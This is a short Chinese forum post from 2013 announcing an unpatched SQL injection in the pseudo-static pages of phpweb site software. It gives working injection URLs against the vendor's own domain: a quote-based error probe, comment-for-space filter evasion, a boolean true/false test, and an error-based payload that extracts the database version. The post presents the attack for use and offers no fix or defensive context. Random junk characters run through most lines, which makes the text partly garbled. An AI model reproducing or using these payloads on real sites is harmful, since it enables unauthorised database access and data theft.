找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2392|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
+ B; u5 w8 r0 Q* I% c& D4 }$ g; {9 j+ R/ S+ J5 G$ E8 r
主站:http://phpweb.net/
; T" S7 P" J7 J4 x0 f- W加’检测:! C& ~7 o) T- Z* V  S4 p( e! v
* \  X! Q  G3 K  ~9 E" u$ Z
http://www.phpweb.net/down/html/?772′.html+ a7 p- \1 |0 g7 j
! z) `) c% z* B5 H# \; Y' y
出错1 h3 N8 j0 t1 ]
存在注入。
4 j$ C* r/ w2 Q% D: R* e不能用空格,只能用/*罗* i; W2 j# d  K& t) @
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
+ j: M2 b+ P! V" D, j3 _1 i ! P/ I) L& k% a% j3 s
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
  h# x3 w( M$ p' }0 P8 U爆数据库版本:  O/ Y# [+ d, g0 i& J# t% ]" g) u

! ?3 X3 m, P0 \+ i7 N; I?
9 E, @. _0 s" _  E2 J1
1 `/ Z/ y0 \. L8 F3 \http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
8 `+ ?6 P& _7 p; y9 |( U4 O) k更新日期: 2013-01-03 13:39:50        8 d/ w- ~" T3 f" @+ J4 E' _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表